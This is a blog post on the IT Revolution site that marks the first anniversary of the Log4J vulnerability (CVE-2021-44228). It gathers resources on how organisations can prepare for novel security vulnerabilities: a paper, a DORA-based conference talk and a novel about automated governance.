LLMs and Generative AI in the enterprise.
Inspire, develop, and guide a winning organization.
Understand the unique values and behaviors of a successful organization.
Create visible workflows to achieve well-architected software.
Understand and use meaningful data to measure success.
Integrate and automate quality, security, and compliance into daily work.
An on-demand learning experience from the people who brought you The Phoenix Project, Team Topologies, Accelerate, and more.
Learn how to enhance collaboration and performance in large-scale organizations through Flow Engineering
Learn how making work visible, value stream management, and flow metrics can affect change in your organization.
Clarify team interactions for fast flow using simple sense-making approaches and tools.
Multiple award-winning CTO, researcher, and bestselling author Gene Kim hosts enterprise technology and business leaders.
In the first part of this two-part episode of The Idealcast, Gene Kim speaks with Dr. Ron Westrum, Emeritus Professor of Sociology at Eastern Michigan University.
In the first episode of Season 2 of The Idealcast, Gene Kim speaks with Admiral John Richardson, who served as Chief of Naval Operations for four years.
Exploring the impact of GenAI in our organizations & creating business impact through technology leadership.
DevOps best practices, case studies, organizational change, ways of working, and the latest thinking affecting business and technology leadership.
The debate over in-office versus remote work misses a fundamental truth: high-performing teams succeed based on how they’re organized, not where they sit.
Leaders can help their organizations move from the danger zone to the winning zone by changing how they wire their organization’s social circuitry.
The values and philosophies that frame the processes, procedures, and practices of DevOps.
This post presents the four key metrics to measure software delivery performance.
December 8, 2022
December 10, 2021. For many, this date brings back nightmares, cold sweats, and panic. On this day, CVE-2021-44228 was issued. A novel security vulnerability was discovered in Log4J, a logging library used in Java development since 2001. It was discovered that Log4J could be provoked into loading code from an attacker’s host. And as Log4J was widely used in on-premises software, software as a service (SaaS), and internally developed applications, the vulnerability was sure to reach far and wide.
Over the next several days, Log4J (sometimes also referred to as Log4Shell) dominated technologists’ social media feeds, disrupted vacations and holiday joy, and was possibly the wake-up call many organizations needed.
As Randy Shoup et al, describe in their paper Responding to novel Security Vulnerabilities, “Vulnerable versions of Log4j were in organizations’ applications’ direct dependencies and in their transitive dependencies. It was embedded in vendor products, including monitoring, visualization, and security tools. Mitigating this vulnerability required companies to change application configurations in anything Java-based. Remediating it required dependency updates, testing and deployment cycles, and redeployment of vendor software.”
The size and scope of this vulnerability highlighted for many organizations that they were still ill-prepared to respond to attacks of this nature. Despite increasing investment in IT security for known vulnerabilities, companies still face the mounting challenge of how to address novel vulnerabilities. How do we prepare for the unknown?
In the aftermath of Log4J, some organizations responded quickly and with relative ease, while others lost days before even beginning their response. As the anniversary of Log4J looms, we wanted to pull together resources that show what this community has learned and how we can better prepare for a future of unknowns.
At the 2022 DevOps Enterprise Forum, a summit of thought leaders from technology and business, Log4J was still top of mind. Log4J made clear that organizations naturally create defenses against vulnerabilities they have experienced in the past (known vulnerabilities). But as the last several years have shown, and Log4J shined a particular spotlight on, new classes of vulnerabilities are continuing to be discovered, including
These “novel” security vulnerabilities challenge organizations in several ways. First, the full scope and impact of a novel vulnerability may not be clear and/or difficult to determine. Second, novel vulnerabilities can require large-scale redeployment of infrastructure and application software. And third, the scale of attacks from novel vulnerabilities can hugely impact customers, making the response from the organization critically urgent.
In the paper Responding to Novel Security Vulnerabilities, authors Randy Shoup, Tapabrata Pal, Michael Nygard, Chris Hill, and Dominica DeGrandis provide leaders with examples and patterns to help create the adaptive capacity needed to prepare for, respond to, and learn from novel security threats. It also provides three clear examples of good, okay, and worst responses to Log4J.
Read the full paper here.
In 2022, it’s more clear than ever that technology drives value and innovation in every organization, no matter the industry. And with that power and influence, there is more pressure from attackers. How can an organization position itself to respond effectively to these threats?
In this presentation from this week’s DevOps Enterprise Summit-Virtual, Nathen Harvey (Cloud Developer Advocate, Google) and Amanda Lewis (Developer Advocate, Google), used the Log4J experience to shed light on how to transform into a high-performing technology team.
In the first half of the presentation, Harvey and Lewis present a fictionalized story of one company’s response to Log4J. Then, they show how findings from the latest DevOps Research and Assessment (DORA) team can help organizations build high-performing teams that are equipped to adapt to and deal with novel vulnerabilities.
Watch their full presentation here.
One big step toward fortifying your organization against both known and unknown threats is to bake security and governance into your software development. We have all known for years that waiting until the end of production to review and test software for security vulnerabilities is fraught with issues. The call to “shift left” on security and audit compliance has been heard by many, but few have effectively achieved it.
In the latest novel from IT Revolution, Investments Unlimited, a team of practitioners and thought leaders show how organizations can use automated governance to effectively “shift left” on security, audit, and more. All the while making the lives of developers and operations happier.
Log4J was a huge influence on the authors, who were in the middle of writing the manuscript for the book when the vulnerability hit. Their shared experiences of dealing with this and many other security vulnerabilities are all present in the novel.
Learn more about the book and start reading an excerpt here.
Log4J and other novel security vulnerabilities have helped push to the forefront several topics like SBOM (software bill of materials), software supply chains, automated governance, etc. Below is a list of several blogs, articles, and papers that cover these topics and are a great resource on your organization’s journey to a more secure future.
Trusted by technology leaders worldwide. Since publishing The Phoenix Project in 2013, and launching DevOps Enterprise Summit in 2014, we’ve been assembling guidance from industry experts and top practitioners.
No comments found
Your email address will not be published.
First Name Last Name
Δ
In The Vibe Coding Handbook: How To Engineer Production-Grade Software With GenAI, Chat, Agents,…
In Part 1 of this blog series, I shared my experience using Claude Code…
Introduction What do you do when you have a critical book deadline and need…
In today's fast-paced organizations, a leader's key role is enabling teams to deliver value…
